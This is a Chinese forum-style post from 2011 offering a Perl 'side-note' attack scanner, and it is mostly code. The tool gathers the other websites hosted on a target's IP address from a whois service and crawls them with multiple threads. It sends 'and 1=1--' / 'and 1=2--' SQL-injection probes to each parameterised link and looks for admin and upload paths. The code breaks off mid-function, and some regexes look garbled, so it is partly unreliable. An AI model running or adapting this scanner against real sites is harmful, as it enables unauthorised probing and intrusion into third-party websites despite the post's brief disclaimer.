自动旁注检测工具代码

仅仅是测试目的，运行基本上已经通过，但是BUG还有很多，以后慢慢更新
由于鼓励自己继续前进的原因，此版本暂时命名为 0.1 :)
简单说明：
基于whois.webhosting.info平台获取旁注网站地址，读取和处理都是多线程工作
多线程部分采用了云舒的模型，该部分引用了许多他的代码，非常感谢他的劳动：）
主要功能是SQL注入简单测试，类似与and 1=1这样的，后台管理和上传路径的检测
:)ps: 转载请注明处处，欢迎喜欢它的人修改以及完善代码
注意： 切勿在未经授权下使用该程序攻击网站，可以作为检测网站安全性的一个小工具：）
#!/usr/bin/perl
# Code by naninb
# Mac osx 10.6.6 & perl 5.10.0
# Date 2011-03-7
#-==============================-
use strict;
use warnings;
 
use URI::URL;
use Web::Scraper;
use LWP::Simple;
use Net::hostent;
use Socket;
 
use Bloom::Filter;
use threads;
use threads::shared;
use Thread::Queue;
use Thread::Semaphore;
 
if (@ARGV < 1 || @ARGV >2)
{
warn "[-] Parameters error,Please input target url, and a thread numbers
";
exit;
}
 
my $my_target = gethost($ARGV[0])->addr;
my $host = URI::URL->new("host>http://".$ARGV[0])->host;
my $thread_number = $ARGV[1]||5;
my @same_ip_sites;
 
my $gms_filter = Bloom::Filter->new( capacity => 1024, error_rate => .0001 );
my $pu_filter = shared_clone(Bloom::Filter->new( capacity => 10000, error_rate => .0001 ));
 
my $sites_queue = Thread::Queue->new();
 
my $semaphore = Thread::Semaphore->new( $thread_number );
my $mutex = Thread::Semaphore->new( 1 );
 
# get others sites thread
threads->create(Get_More_Sites,$my_target);
 
while( 1 )
{
# join all threads which can be joined
#my $joined = 0;
foreach ( threads->list(threads::joinable) )
{
#$joined ++;
$_->join( );
}
#print $joined, " joined
";
 
# if there are no url need process.
my $item = $sites_queue->pending();
if( $item == 0 )
{
my $active = threads->list(threads::running);
# there are no active thread, we finish the job
if( $active == 0 )
{
print "All done!
";
last;
}
# we will get some more url if there are some active threads, just wait for them
else
{
#print "[MAIN] 0 URL, but $active active thread
";
sleep 1;
next;
}
}
 
# if there are some url need process
#print "[MAIN] $item URLn";
$semaphore->down;
#print "[MAIN]Create thread.n";
threads->create( &ProcessUrl );
}
 
 
foreach (threads->list())
{
$_->join();
}
 
 
 
sub Get_More_Sites
{
my ($site) = @_;
my $res;
my $page_number;
my $html_filter = scraper {
process "//a", "list[]" => { link => @href, text => "TEXT" };
};

my $whois_my_target = "http://whois.webhosting.info/".inet_ntoa($site);

my $first_try = get($whois_my_target);

if (!defined $first_try)
{
warn "[-] Get page numbers error!
";
exit;
}

# count pages numbers
if($first_try =~ /pi=(d*)8&ob=SLD&oo=ASC">Next/i)
{
$page_number = $1;
}elsif($first_try =~ /pi=(d*)&ob=SLD&oo=ASC">  Last/i)
{
$page_number = $1;
}

die "[-] Searching encounter random number authentication, try manual to post it!
" unless defined $page_number;

my $i = 1;
while($i <= $page_number)
{
my $whois_my_target = $whois_my_target."?pi=".$i."&ob=SLD&oo=ASC";
eval
{
$res = $html_filter->scrape( URI->new($whois_my_target) );
};
if( $@ )
{
#warn "$@
";
exit;
}
for my $a_text (@{$res->{list}})
{
#print "$a_text->{link}, $a_text->{text}
";
if( $a_text->{link} =~ /^http://whois.webhosting.info/$a_text->{text}/ )
{
if($a_text->{text} =~ /([wd]+.[w]{2,3})./)
{
# filter repeat elements
if (!$gms_filter->check($1))
{
#print "www.".$1."
";
$gms_filter->add($1);

push @same_ip_sites, "www.".$1;
$sites_queue->enqueue("http://www.".$1);

}
} 
}
}

$i++;
}
 
if ($sites_queue->pending() < 1)
{
warn "[-] Your target have not much more sites for you, sorry!
";
exit;
}
}
 
sub ProcessUrl
{
my $scraper = scraper
{
process //a, links[] => @href;
};
 
my $res;
my $link;
 
while( my $url = $sites_queue->dequeue_nb() )
{
eval
{
$res = $scraper->scrape( URI->new($url) )->{links};
};
if( $@ )
{
#warn "$@
";
next;
}
next if (! defined $res );
 
print "[+] Testing $url
";
 
foreach( @{$res} )
{
$link = $_->as_string;
$link = URI::URL->new($link, $url);
 
# not http and not https?
next if( $link->scheme ne http && $link->scheme ne https );
 
#next if( $link->host ne $host );
my $flag = 0;
foreach (@same_ip_sites)
{
($flag = 1,last) if ($_ eq $link->host);
}

next if( $flag == 1 );
 
$link = $link->abs->as_string;
 
$mutex->down();
# detect something
# sql injection, 2011-03-07
Detect_Sql_inj($link);
# manage page path
Detect_Manage_page($link);
# upload page path
Dectect_Upload_page($link);

if( ! $pu_filter->check($link) )
{
print $pu_filter->key_count(), " ", $link, "
";
$pu_filter->add($link);
$sites_queue->enqueue($link);
}
 
$mutex->up();
undef $link;
}
undef $res;
}
undef $scraper;
$semaphore->up( );
}
 
sub Detect_Sql_inj
{
my ($link) = @_;
if( $link =~ /(.*?)?(wd*)=/ )
{ 
my $and11 = get($link." and 1=1--");
my $and12 = get($link." and 1=2--");
print "[+] Found sql injection at the ",$link,"
" if( length($and11) != length($and12) );

my $and13 = get($link." and 1=1--");
my $and14 = get($link." and 1=2--");
print "[+] Found sql injection at the ",$link,"
" if( length($and13) != length($and14) );

}
}
 
sub Detect_Manage_page
{
my ($link) = @_;
my @mm_path = ("admin","adm","manage","administrator");

if ($link =~ /(.*?)#(.*)/)
{
use LWP::UserAgent;
 
my $ua = LWP::UserAgent->new();
$ua->timeout(5);
$ua->env_prox

补充：综合编程 , 安全编程 ,

上一个：总结Spring Security之 关于Authentication
下一个：java与.net平台之间进行RSA加密验证